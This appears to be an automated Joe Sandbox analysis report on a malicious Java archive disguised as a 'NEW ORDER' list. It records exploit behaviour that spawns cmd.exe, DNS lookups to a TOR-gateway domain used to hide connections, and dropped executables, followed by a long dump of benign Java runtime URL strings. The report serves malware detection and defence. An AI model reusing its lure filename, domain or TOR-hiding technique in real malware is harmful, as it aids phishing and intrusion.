Analysis Report

Overview

General Information

Joe Sandbox Version:	22.0.0
Analysis ID:	53179
Start time:	09:11:46
Joe Sandbox Product:	CloudBasic
Start date:	04.04.2018
Overall analysis duration:	0h 7m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	NEW ORDER .LIST 105.jar
Cookbook file name:	defaultwindowsfilecookbook.jbs
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.expl.troj.winJAR@27/212@5/2
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
HDC Information:	Failed
Cookbook Comments:	Adjust boot time Correcting counters for adjusted boot time
Warnings:	Show All Exclude process from analysis (whitelisted): conhost.exe Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtReadFile calls found. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: cmd.exe, java.exe, java.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	96	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Signature Overview

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: vvrhhhnaijyj6s2m.onion.top

virustotal: Detection: 13%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: NEW ORDER .LIST 105.jar

virustotal: Detection: 43%

Perma Link

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Networking:

Uses TOR for connection hidding

Show sources

Source: unknown	DNS query: name: vvrhhhnaijyj6s2m.onion.top
Source: unknown	DNS query: name: vvrhhhnaijyj6s2m.onion.top
Source: unknown	DNS query: name: vvrhhhnaijyj6s2m.onion.top
Source: unknown	DNS query: name: vvrhhhnaijyj6s2m.onion.top
Source: unknown	DNS query: name: vvrhhhnaijyj6s2m.onion.top

Found strings which match to known social media urls

Show sources

Source: jfxrt.jar.17.dr

String found in binary or memory: // www.yahoo.com.by, for example), so we list it here for safety's sake. equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: vvrhhhnaijyj6s2m.onion.top

Urls found in memory or binary data

Show sources

Source: deploy.jar.17.dr, plugin.jar.17.dr, jfxwebkit.dll.17.dr	String found in binary or memory: file://
Source: deploy.jar.17.dr, plugin.jar.17.dr, jfxwebkit.dll.17.dr	String found in binary or memory: file:///
Source: deploy.jar.17.dr	String found in binary or memory: file:////
Source: deploy.jar.17.dr	String found in binary or memory: file://///
Source: jfxwebkit.dll.17.dr	String found in binary or memory: file:///0123456789abcdef0123456789ABCDEF-4
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/charsets.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/access-bridge.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/cldrdata.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/dnsns.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/jaccess.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/jfxrt.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/localedata.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/nashorn.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/sunec.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/sunjce_provider.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/sunmscapi.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/sunpkcs11.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/ext/zipfs.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/jce.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/jfr.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/jsse.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/resources.jar
Source: java.exe	String found in binary or memory: file:///C:/Program%20Files/Java/jre1.8.0_144/lib/rt.jar
Source: java.exe	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Local/Temp/jartracer.jar
Source: java.exe	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/NEW%20ORDER%20.LIST%20105.jar
Source: jfxwebkit.dll.17.dr	String found in binary or memory: file:///etc/xml/catalog
Source: deployJava1.dll.17.dr	String found in binary or memory: file://deployHelperhttps://HTTP/1.1GETRange:
Source: deployJava1.dll.17.dr	String found in binary or memory: file://file:/Error:%08x
Source: jfxwebkit.dll.17.dr	String found in binary or memory: file://file__0
Source: glib-lite.dll.17.dr	String found in binary or memory: file://localhostThe
Source: rt.jar.17.dr, deploy.jar.17.dr, plugin.jar.17.dr, javaws.jar.17.dr	String found in binary or memory: http://
Source: jfxrt.jar.17.dr	String found in binary or memory: http://about.museum/naming/
Source: java.exe	String found in binary or memory: http://apache.o
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/#
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/3
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsc
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: resources.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations9
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsC
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsz%
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/include-comments
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesO
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/namespaces
Source: java.exe, rt.jar.17.dr, deploy.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdS
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant3
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesK
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking%
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultA
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef:
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydefc
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/xinclude
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-urisC
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language%
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/xinclude1
Source: java.exe	String found in binary or memory: http://apache.org/xml/features/xincludex
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node9
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size3
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory:
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner%
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor5
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processorc
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner8
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/entity-managerk
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver7
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolverC
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter;
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder%
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context:
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context;
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolverg/=
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/symbol-tableQ
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerK
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerS
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation-managerSF
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory3
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory7
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd:
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema8
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler#
Source: rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/internal/xpointer-handler
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/kqu
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/locale
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation%
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/security-manager(c
Source: java.exe	String found in binary or memory: http://apache.org/xml/properties/security-manager8
Source: resources.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/xpointer-schema
Source: resources.jar.17.dr	String found in binary or memory: http://apache.org/xml/properties/xpointer-schema.
Source: rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/serializer
Source: java.exe, rt.jar.17.dr	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: java.exe	String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes/
Source: jvm.dll.17.dr	String found in binary or memory: http://bugreport.java.com/bugreport/crash.jsp
Source: jvm.dll.17.dr	String found in binary or memory: http://bugreport.java.com/bugreport/crash.jspVM
Source: java.exe, java.dll.17.dr	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: java.dll.17.dr	String found in binary or memory: http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven
Source: deploy.jar.17.dr	String found in binary or memory: http://bugs.sun.com
Source: gstreamer-lite.dll.17.dr	String found in binary or memory: http://bugzilla.gnome.org/enter_bug.cgi?product=GStreamer.
Source: gstreamer-lite.dll.17.dr	String found in binary or memory: http://bugzilla.gnome.org/enter_bug.cgi?product=GStreamer.GStreamer
Source: gstreamer-lite.dll.17.dr	String found in binary or memory: http://bugzilla.gnome.org/enter_bug.cgi?product=GStreamer.Internal
Source: gstreamer-lite.dll.17.dr	String found in binary or memory: http://bugzilla.gnome.org/enter_bug.cgi?product=GStreamer.This
Source: gstreamer-lite.dll.17.dr	String found in binary or memory: http://bugzilla.gnome.org/enter_bug.cgi?product=GStreamer.Your
Source: jfxrt.jar.17.dr	String found in binary or memory: http://cenpac.net.nr/dns/index.html
Source: jfxrt.jar.17.dr	String found in binary or memory: http://cnnic.cn/html/Dir/2005/10/11/3218.htm
Source: java.exe	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: java.exe	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: java.exe	String found in binary or memory: http://crl.comodo.net/AAACertificateServices.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://crl.comodo.net/AAACertificateServices.crl0
Source: java.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: java.exe	String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: java.exe	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: ssv.dll.17.dr, prism_sw.dll.17.dr, ktab.exe.17.dr, glass.dll.17.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: java.exe	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-ClientAuthenticationandEmail.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-ClientAuthenticationandEmail.crl0
Source: java.exe	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Hardware.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Hardware.crl01
Source: java.exe	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: java.exe	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: java.exe, cacerts.17.dr	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: deploy.jar.17.dr, javaws.jar.17.dr	String found in binary or memory: http://dl.javafx.com/javafx-cache.jnlp
Source: deploy.jar.17.dr, javaws.jar.17.dr	String found in binary or memory: http://dl.javafx.com/javafx-rt.jnlp
Source: jfxrt.jar.17.dr	String found in binary or memory: http://dns.marnet.net.mk/postapka.php
Source: jfxrt.jar.17.dr	String found in binary or memory: http://domain.nida.or.kr/eng/registration.jsp
Source: Welcome.html.17.dr	String found in binary or memory: http://download.oracle.com/javase/7/docs/technotes/guides/plugin/
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ac
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ad
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ae
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.am
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ao
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.aq
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ar
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.arpa
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.as
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.asia
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.at
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.au
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.aw
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ax
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.az
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ba
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bb
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bd
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.be
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bg
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bh
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bi
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.biz
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bj
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bn
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bt
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bw
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.by
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.bz
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ca
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cat
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cc
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cd
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cg
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ch
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ci
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ck
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cl
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cn
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.co
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.com
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.coop
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cu
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cv
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cx
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cy
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.cz
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.de
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.dj
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.dk
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.dm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.do
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.dz
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.edu
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.eg
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.er
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.et
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.eu
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.fi
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.fj
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.fk
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.fm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.fo
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ga
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gc.ca
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gd
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gf
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gh
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gl
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gov
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gq
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gs
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gw
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.gy
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.hm
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.id
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.ie
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.il
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.in
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.info
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.int
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.it
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.jobs
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.jp
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.km
Source: jfxrt.jar.17.dr	String found in binary or memory: http://en.wikipedia.org/wiki/.kn
